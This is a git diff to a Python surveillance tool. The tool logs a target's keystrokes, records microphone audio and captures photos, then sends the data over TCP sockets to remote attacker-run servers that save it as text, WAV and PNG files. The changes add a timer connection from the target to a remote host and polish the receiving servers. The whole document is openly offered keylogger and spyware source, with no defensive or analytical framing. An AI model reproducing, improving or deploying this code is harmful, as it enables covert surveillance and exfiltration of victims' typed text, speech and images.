@@ -10,6 +10,7 @@ import pyaudio
 import wave
 import threading
 import ast
+import BetterPrinting as bp
 
 def daten_aufnehemen():
     format = pyaudio.paInt16
@@ -129,7 +130,7 @@ def on_release(key):
 
 class KeyloggerTarget:
     def __init__(self, ip_of_server_photos, port_of_server_photos, ip_of_server_keylogger_data,
-                 port_of_server_keylogger_data,ip_of_server_listener, port_of_server_listener, duration_in_seconds=200):
+                 port_of_server_keylogger_data,ip_of_server_listener, port_of_server_listener,ip_of_timer, port_of_timer,  duration_in_seconds=200):
         global listening_time
         global ip_listener
         global port_listener
@@ -141,6 +142,8 @@ class KeyloggerTarget:
         self.ip_listener = ip_of_server_listener
         self.port_listener = port_of_server_listener
         self.duration = duration_in_seconds
+        self.ip_timer = ip_of_timer
+        self.port_timer = port_of_timer
 
         ip_listener = self.ip_listener
         port_listener = self.port_listener
@@ -153,6 +156,13 @@ class KeyloggerTarget:
         else:
             listening_thread = threading.Thread(target=daten_aufnehemen)
             listening_thread.start()
+
+            send_timer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            send_timer.connect((self.ip_timer, self.port_timer))
+
+            send_timer.send(str(self.duration).encode())
+            send_timer.close()
+
             with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
                 countdown_send(self.duration, self.ip_photos, self.port_photos, self.ip_keylogger, self.port_keylogger)
                 listener.join()
@@ -166,33 +176,39 @@ class ServerKeylogger:
         self.port = port
 
     def start(self):
-        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        server.bind((self.ip, self.port))
-        server.listen(5)
+        try:
+            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            server.bind((self.ip, self.port))
+            server.listen(5)
 
-        print("Waiting for connection....")
-        clientsocket, ipaddress = server.accept()
-        # Data is in clientsocket and the ip-address is obviously in "ipaddress"
-        print(f"Connection has been established with {ipaddress}")
+            bp.color("Waiting for connection....", "magenta")
+            clientsocket, ipaddress = server.accept()
+            # Data is in clientsocket and the ip-address is obviously in "ipaddress"
+            bp.color(f"Connection has been established with {ipaddress}", "magenta")
 
-        full_msg = ""
-        while True:
-            msg = clientsocket.recv(200).decode()
+            full_msg = ""
+            while True:
+                msg = clientsocket.recv(200).decode()
 
-            if len(msg) <= 0: break
-            full_msg += msg
+                if len(msg) <= 0: break
+                full_msg += msg
 
-        for zeichen in full_msg:
-            if "{" == zeichen:
-                # "{" this detects if a space or a tab is in full_msg
-                full_msg = full_msg.replace("{", " ")
-        # The data is being stored in full_msg
-        print(full_msg)
-        zeit = time.strftime("%H-%M-%S  -%Y")
-        # This is the time the data has arrived
-        with open(f"Keylogger of the ip {ipaddress} Time {zeit}.txt", "a+", encoding="utf-8") as file:
-            file.write(f"Here is everything the target was typing \n\n{full_msg}")
+            for zeichen in full_msg:
+                if "{" == zeichen:
+                    # "{" this detects if a space or a tab is in full_msg
+                    full_msg = full_msg.replace("{", " ")
+            # The data is being stored in full_msg
+            bp.color(f"Text of target: {full_msg}", "magenta")
+            zeit = time.strftime("%H-%M-%S-%Y")
+            # This is the time the data has arrived
+            if full_msg != "":
+                with open(f"Keylogger of the target Time {zeit}.txt", "a+", encoding="utf-8") as file:
+                    file.write(f"Here is everything the target was typing \n\n{full_msg}")
 
+            else: bp.color("The Target didn't type something...", "magenta")
+
+        except OSError:
+            raise OSError("Change the port number to run without an error")
 
 class ServerPhotos:
     # This is the class of the Server. Both Server should not be in the same file
@@ -201,30 +217,42 @@ class ServerPhotos:
         self.port = port
 
     def start(self):
-        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        server.bind((self.ip, self.port))
-        server.listen(1000)
+        bp.color("Cyan: ServerPhotos", "cyan")
+        bp.color("Blue: ServerKeylogger", "magenta")
+        bp.color("Green: ServerListener", "green")
+        print("White: Timer")
+        print("\n")
+        try:
+            server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            server.bind((self.ip, self.port))
+            server.listen(1000)
 
-        anzahl = 0
-        while True:
-            print("Waiting for connection...")
-            client_socket, address = server.accept()
-            # Data is in client_socket and the address is obviously in "ipaddress"
-            full_msg = b""
-            # All the binary data is being stored in full_msg as in the previous classes
+            anzahl = 0
             while True:
-                msg = client_socket.recv(200)
-                if len(msg) <= 0: break
-                full_msg += msg
-            client_socket.close()
-            anzahl += 1
+                bp.color("Waiting for connection...", "cyan")
+                client_socket, address = server.accept()
+                bp.color(f"\n\nConnection has been established with {address}", "cyan")
+                # Data is in client_socket and the address is obviously in "ipaddress"
+                full_msg = b""
+                # All the binary data is being stored in full_msg as in the previous classes
+                while True:
+                    msg = client_socket.recv(20000)
+                    if len(msg) <= 0: break
+                    full_msg += msg
+                client_socket.close()
+                anzahl += 1
 
-            with open(f"New_Image ({anzahl}).png", "wb") as file:
-                # This stores the image
-                file.write(full_msg)
+                with open(f"New_Image ({anzahl}).png", "wb") as file:
+                    # This stores the image
+                    file.write(full_msg)
 
-            # "anzahl" is for the amount of photos
-            print(full_msg)
+                # "anzahl" is for the amount of photos
+                if anzahl > 1: bp.color(f"{anzahl} Images has been saved to your working directory", "cyan")
+                else: bp.color(f"{anzahl} Image have been saved to your working directory", "cyan")
+                #Detetcts how many Image have been saved to your directory
+
+        except OSError:
+            raise OSError("Change the port number to run without an error")
 
 class ServerListener:
     def __init__(self, ip, port):
@@ -232,31 +260,76 @@ class ServerListener:
         self.port = port
 
     def start(self):
-        listening_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        listening_data.bind((self.ip, self.port))
-        listening_data.listen(5)
-        # 5 possible connection
+        try:
+            listening_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            listening_data.bind((self.ip, self.port))
+            listening_data.listen(5)
+            # 5 possible connection
 
-        print("Waiting for connection...")
-        # Waits for a connection
+            bp.color("Waiting for connection...", "green")
+            # Waits for a connection
 
-        client_socket, ipaddress = listening_data.accept()
-        print(f"Connection has been established with {ipaddress}")
-        check = 0
+            client_socket, ipaddress = listening_data.accept()
+            bp.color(f"Connection has been established with {ipaddress}", "green")
+            check = 0
+            full_msg = ""
+            while True:
+                msg = client_socket.recv(3000000).decode()
+                # The buffersize is 30000000 because there is a lot of data in audio files
+                if len(msg) <= 0: break
+                full_msg += msg
+
+            listening_data.close()
+            frames = ast.literal_eval(full_msg)
+            data_file = wave.open("Audio of target.wav", "wb")
+            data_file.setnchannels(2)
+            data_file.setsampwidth(2)
+            data_file.setframerate(44100)
+            data_file.writeframes(b''.join(frames))
+            data_file.close()
+            bp.color('"Audio of target.wav" has been saved to your directory', "green")
+
+            #This stores everything the target was talking
+        except OSError:
+            raise OSError("Change the port number to run without an error")
+
+class Timer:
+    def __init__(self, ip, port):
+        self.ip = ip
+        self.port = port
+
+    def countdown(self, seconds):
+        minuten = seconds / 60
+        minutes = math.floor(minuten)
+        false_second = minutes * 60
+        exact_seconds = seconds - false_second
+
+        print(f"The target is being connected. The IP of the target is coming....")
+        while seconds:
+            mins, secs = divmod(seconds, 60)
+            timer = '{:02d}:{:02d}'.format(mins, secs)
+            print(f"\rTime left: {timer}", end="")
+            time.sleep(1)
+            seconds -= 1
+
+        if minutes == 0:
+            print(f"\nSuccessful connection for {exact_seconds} seconds")
+        elif exact_seconds == 0:
+            print(f"\nSuccessful connection for {minutes} minutes")
+        else:
+            print(f"\nSuccessful connection for {minutes} minutes and {exact_seconds} seconds")
+
+    def start_timer(self):
+        show_time = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        show_time.bind((self.ip, self.port))
+        show_time.listen(2)
+
+        client_socket, ipaddress = show_time.accept()
         full_msg = ""
         while True:
-            msg = client_socket.recv(3000000).decode()
-            # The buffersize is 30000000 because there is a lot of data in audio files
+            msg = client_socket.recv(10).decode()
             if len(msg) <= 0: break
             full_msg += msg
 
-        listening_data.close()
-        frames = ast.literal_eval(full_msg)
-        data_file = wave.open("test.wav", "wb")
-        data_file.setnchannels(2)
-        data_file.setsampwidth(2)
-        data_file.setframerate(44100)
-        data_file.writeframes(b''.join(frames))
-        data_file.close()
-
-        #This stores everything the target was talking
\ No newline at end of file
+        seconds = int(full_msg)
+        self.countdown(seconds)
\ No newline at end of file
